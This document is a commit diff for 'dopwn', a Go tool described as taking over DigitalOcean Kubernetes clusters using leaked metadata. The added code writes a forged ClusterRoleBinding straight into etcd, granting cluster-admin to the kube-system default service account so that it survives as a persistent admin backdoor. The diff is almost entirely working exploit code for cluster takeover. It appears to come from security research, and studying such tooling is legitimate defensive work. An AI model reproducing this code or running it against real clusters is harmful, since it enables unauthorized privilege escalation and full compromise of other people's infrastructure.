The final bit - adding the crb to etcd

cmd/dopwn/main.go

@@ -29,7 +29,7 @@ var cfgFile string
 // rootCmd represents the base command when called without any subcommands
 var rootCmd = &cobra.Command{
 	Use:   "dopwn",
-	Short: "Take over a Digital Ocean Kubernetes cluster via sensitive metadata",
+	Short: "Take over a DigitalOcean Kubernetes cluster via sensitive metadata",
 }
 
 func main() {

pkg/etcd/client.go

@@ -73,3 +73,15 @@ func (c *Client) GetValue(key string) ([]byte, error) {
 
 	return []byte(gr.Kvs[0].Value), err
 }
+
+// PutValue inserts a key into etcd
+func (c *Client) PutValue(key string, value []byte) error {
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(3)*time.Second)
+	kv := clientv3.NewKV(c.client)
+	_, err := kv.Put(ctx, key, string(value))
+	cancel()
+	if err != nil {
+		return err
+	}
+	return nil
+}

pkg/exploit/exploit.go

@@ -7,6 +7,8 @@ import (
 	"fmt"
 	"io/ioutil"
 
+	"github.com/4armed/dopwn/pkg/rbac"
+
 	"github.com/4armed/dopwn/pkg/etcd"
 	"github.com/4armed/dopwn/pkg/metadata"
 	"github.com/kubicorn/kubicorn/pkg/logger"
@@ -23,6 +25,7 @@ type config struct {
 	etcdKeyFile      string
 	k8sCaFile        string
 	kubeConfig       string
+	roleBindingName  string
 }
 
 // SecretObject will contain our secret details are unmarshal
@@ -182,9 +185,31 @@ func Command() *cobra.Command {
 			if err != nil {
 				return fmt.Errorf("unable to write kubeconfig file: %v", err)
 			}
-
 			logger.Info("wrote kubeconfig")
 
+			logger.Info("generating clusterrolebinding")
+			crb := rbac.GenerateForearmedClusterRoleBinding(c.roleBindingName)
+			jsonClusterRoleBinding, err := json.Marshal(crb)
+			logger.Debug(string(jsonClusterRoleBinding))
+
+			logger.Info("encoding clusterrolebinding")
+			inMediaType, err = encoding.ToMediaType("json")
+			if err != nil {
+				return err
+			}
+			var jsonClusterRoleBindingBytes bytes.Buffer
+			err = encoding.Convert(inMediaType, encoding.StorageBinaryMediaType, jsonClusterRoleBinding, &jsonClusterRoleBindingBytes)
+			if err != nil {
+				return fmt.Errorf("unable to encode clusterrolebinding: %v", err)
+			}
+
+			logger.Info("inserting clusterrolebinding into etcd......wish me luck......")
+			err = etcdClient.PutValue("/registry/clusterrolebindings/"+c.roleBindingName, jsonClusterRoleBindingBytes.Bytes())
+			if err != nil {
+				return fmt.Errorf("unable to add clusterrolebinding key: %v", err)
+			}
+
+			logger.Info("this is the end, we're done here, try it out.....")
 			return nil
 
 		},
@@ -194,7 +219,8 @@ func Command() *cobra.Command {
 	cmd.Flags().StringVar(&c.etcdCaFile, "ca-cert", "etcd-ca.crt", "File to write etcd ca cert to")
 	cmd.Flags().StringVar(&c.etcdCertFile, "etcd-cert", "etcd.crt", "File to write etcd cert to")
 	cmd.Flags().StringVar(&c.etcdKeyFile, "etcd-key", "etcd.key", "File to write etcd key to")
-	cmd.Flags().StringVarP(&c.metadataFilename, "metadata-file", "f", "", "Load Digital Ocean metadata from the specified filename")
+	cmd.Flags().StringVar(&c.roleBindingName, "crb-name", "forearmed:cluster-admin", "Name of the ClusterRoleBinding to add")
+	cmd.Flags().StringVarP(&c.metadataFilename, "metadata-file", "f", "", "Load DigitalOcean metadata from the specified filename")
 	cmd.Flags().StringVarP(&c.kubeConfig, "kubeconfig", "k", "kubeconfig", "The filename to write the kubeconfig to")
 
 	cmd.MarkFlagRequired("metadata-file")

pkg/rbac/clusterrolebinding.go

@@ -0,0 +1,70 @@
+package rbac
+
+import (
+	"time"
+
+	"github.com/pborman/uuid"
+)
+
+// Metadata redefines a bunch of things from k8s
+type Metadata struct {
+	CreationTimeStamp string    `json:"creationTimestamp"`
+	Name              string    `json:"name"`
+	UID               uuid.UUID `json:"uid"`
+}
+
+// RoleRef redefines a bunch of things from k8s
+type RoleRef struct {
+	APIGroup string `json:"apiGroup"`
+	Kind     string `json:"kind"`
+	Name     string `json:"name"`
+}
+
+// Subject redefines a bunch of things from k8s
+type Subject struct {
+	APIGroup  string `json:"apiGroup"`
+	Kind      string `json:"kind"`
+	Name      string `json:"name"`
+	Namespace string `json:"namespace"`
+}
+
+// ForearmedClusterRoleBinding redefines a bunch of things from k8s
+type ForearmedClusterRoleBinding struct {
+	APIVersion string    `json:"apiVersion"`
+	Kind       string    `json:"kind"`
+	Metadata   Metadata  `json:"metadata"`
+	RoleRef    RoleRef   `json:"roleRef"`
+	Subjects   []Subject `json:"subjects"`
+}
+
+// GenerateForearmedClusterRoleBinding creates a cluster role binding in JSON format suitable
+// for encoding with auger and pushing into etcd
+func GenerateForearmedClusterRoleBinding(name string) ForearmedClusterRoleBinding {
+	uid := uuid.NewUUID()
+	timestamp := time.Now().Format(time.RFC3339)
+
+	crb := ForearmedClusterRoleBinding{
+		APIVersion: "rbac.authorization.k8s.io/v1",
+		Kind:       "ClusterRoleBinding",
+		Metadata: Metadata{
+			CreationTimeStamp: timestamp,
+			Name:              name,
+			UID:               uid,
+		},
+		RoleRef: RoleRef{
+			APIGroup: "rbac.authorization.k8s.io",
+			Kind:     "ClusterRole",
+			Name:     "cluster-admin",
+		},
+		Subjects: []Subject{
+			Subject{
+				APIGroup:  "rbac.authorization.k8s.io",
+				Kind:      "ServiceAccount",
+				Name:      "default",
+				Namespace: "kube-system",
+			},
+		},
+	}
+
+	return crb
+}